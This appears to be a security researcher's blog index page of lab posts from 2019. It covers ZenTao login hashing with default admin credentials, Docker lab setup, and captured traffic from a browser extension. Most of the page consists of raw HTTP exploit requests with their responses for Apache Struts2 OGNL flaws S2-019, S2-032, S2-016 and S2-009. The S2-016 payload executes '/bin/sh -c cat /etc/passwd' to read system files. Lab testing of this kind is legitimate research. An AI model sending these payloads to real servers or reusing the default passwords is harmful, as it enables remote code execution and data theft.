Neurohazard
Evening clouds and misty moon, poring over the classics until white-haired; all things under heaven, thus have I heard.

Fofa Advanced Search Syntax, SDK/API Usage, and PoC Writing Tutorial

September 16, 2019

Fofa Advanced Search Syntax, SDK/API Usage, and PoC Writing Tutorial

Body: The recorded video has been uploaded to Baidu Netdisk. Link: https://pan.baidu.com/s/1MquLQh5Ge_MjDQo9cRHrbA Extraction code: rna4

September 16, 2019

ZenTao: Black-Box Reverse Analysis of the Login Process

ZenTao weak-password analysis

Default configuration: http://192.168.198.133/zentao/admin-safe.html A ZenTao instance in its default configuration asks the administrator to change the weak password after logging in.

How the password ciphertext is computed: hashTable.md5(hashTable.md5(this.plaintext)+this.salt)

$('#loginPanel #submit').click(function() {
    var password = $('input:password').val().trim();
    var passwordStrength = computePasswordStrength(password);
    $('#submit').after("<input type='hidden' name='passwordStrength' value='" + passwordStrength + "'>");
    var rand = $('input#verifyRand').val();
    if(password.length != 32 && typeof(md5) == 'function') $('input:password').val(md5(md5(password) + rand));
});

Login succeeded: request […]

September 16, 2019

Firefox Extension Flash Video Downloader: Partial HTTP Traffic

Body: https://addons.mozilla.org/zh-CN/firefox/addon/flash-videodownloader/?src=search

Request:
GET /api/config/?id=ductloanphuok%40gmail.com&version=6.3.14&lt=31004081&uid=95345bc6-b220-efd2-c070-2c8a1701c10d&r=1568608207951 HTTP/1.1
Host: flashvd.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: __cfduid=d217ed1370e498eae12b455cc40594adc1568255256

Response:
HTTP/1.1 200 OK
Date: Mon, 16 Sep 2019 04:30:04 GMT
Content-Type: application/json
Connection: close
Alt-Svc: h2=":443"; […]

September 16, 2019

Setting Up ZenTao Community Edition with Docker

Body: https://hub.docker.com/r/idoop/zentao/tags

sudo docker pull idoop/zentao:10.0
sudo mkdir -p /data/zbox && \
sudo docker run -d -p 80:80 -p 33306:3306 \
-e ADMINER_USER="root" -e ADMINER_PASSWD="password" \
-e BIND_ADDRESS="false" \
-v /data/zbox/:/opt/zbox/ \
--add-host smtp.exmail.qq.com:163.177.90.125 \
--name zentao-server \
idoop/zentao:10.0

The default ZenTao admin password is admin/123456.

References: All-versions RCE vulnerability analysis of a certain "Dao" product https://xz.aliyun.com/t/6239

September 12, 2019

Struts2 S2-019 HTTP raw text

Detection request:
POST /example/HelloWorld.action HTTP/1.1
Host:192.168.198.133:80
Accept-Language: zh_CN
User-Agent: Auto Spider 1.0
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 492
Content-Type: application/x-www-form-urlencoded

debug=command&expression=%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22struts2_security_%22),%23resp.getWriter().print(%22check%22),%23resp.getWriter().flush(),%23resp.getWriter().close()

HTTP/1.1 200
Set-Cookie: JSESSIONID=339037A73494B91A16B5EC3974F956EC; Path=/; HttpOnly
Content-Type: text/plain;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Thu, 12 Sep 2019 07:42:15 GMT
Connection: close

16 […]

September 12, 2019

Struts2 S2-020 Environment

Body: https://hub.docker.com/r/tutum/tomcat A Tomcat environment with the host manager already configured.

September 12, 2019

All-Versions RCE Vulnerability Analysis of a Certain "Dao" Product

https://xz.aliyun.com/t/6239

September 12, 2019

Struts S2-032 HTTP raw text

Body

Analysis

[![s2-032](http://wp.blkstone.me/wp-content/uploads/2019/09/s2_032_20190912.png "s2-032")](http://wp.blkstone.me/wp-content/uploads/2019/09/s2_032_20190912.png "s2-032")

Probe request:
POST / HTTP/1.1
Cookie: SessionId=96F3F15432E0660E0654B1CE240C4C36
User-Agent: Java/1.8.0_212
Host: 192.168.198.133:8888
Accept: text/html, image/gif, image/jpeg, *; q=.2, /; q=.2
Connection: keep-alive
Content-type: application/x-www-form-urlencoded
Content-Length: 209

method%3a%23_memberAccess%3d@ognl.OgnlContext+@DEFAULT_MEMBER_ACCESS%2c%23kxlzx%3d+@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2c%23kxlzx.println%2888888888-1%29%2c%23kxlzx.close

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 9 […]

September 11, 2019

Struts S2-016 HTTP Raw TEXT

Exploitation request:
POST /login.action HTTP/1.1
Cookie: SessionId=96F3F15432E0660E0654B1CE240C4C36
User-Agent: Java/1.8.0_212
Host: 192.168.198.133
Accept: text/html, image/gif, image/jpeg, *; q=.2, /; q=.2
Connection: keep-alive
Content-type: application/x-www-form-urlencoded
Content-Length: 651

redirect:%24%7B%23resp%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%28new+java.lang.ProcessBuilder(new+java.lang.String[]{'/bin/sh','-c','cat+/etc/passwd'})).start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23dis%3Dnew+java.io.DataInputStream%28%23b%29%2C%23buf%3Dnew+byte%5B20000%5D%2C%23dis.read%28%23buf%29%2C%23msg%3Dnew+java.lang.String%28%23buf%29%2C%23dis.close%28%29%2C%23resp.getWriter%28%29.println%28%23msg.trim%28%29%29%2C%23resp.getWriter%28%29.flush%28%29%2C%23resp.getWriter%28%29.close%28%29%7D=

HTTP/1.1 200 OK
Server: nginx/1.12.2
Date: Wed, 11 Sep 2019 07:07:30 GMT
Transfer-Encoding: chunked […]

September 11, 2019

Struts S2-009 HTTP Raw TEXT

Body:
POST /login.action HTTP/1.1
Cookie: SessionId=96F3F15432E0660E0654B1CE240C4C36
User-Agent: Java/1.8.0_212
Host: 192.168.198.133
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Content-type: application/x-www-form-urlencoded
Content-Length: 444

class.classLoader.jarPath=%28%23context%5b%22xwork.MethodAccessor.denyMethodExecution%22%5d%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess%5b%22allowStaticMethodAccess%22%5d%3dtrue%2c%23outstr%3d@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2c%23outstr.print%28%22webpath%22%29%2c%23outstr.println%28%22888888%22%29%2c%23outstr.close%28%29%29%28meh%29&z%5b%28class.classLoader.jarPath%29%28%27meh%27%29%5d=

HTTP/1.1 200 OK
Server: nginx/1.12.2
Date: Wed, 11 Sep 2019 04:00:24 GMT
Content-Length: 15
Connection: keep-alive
Set-Cookie: JSESSIONID=16985C7B820E22E13767E10B8AD57496-n1; Path=/
Content-Language: zh-CN

webpath888888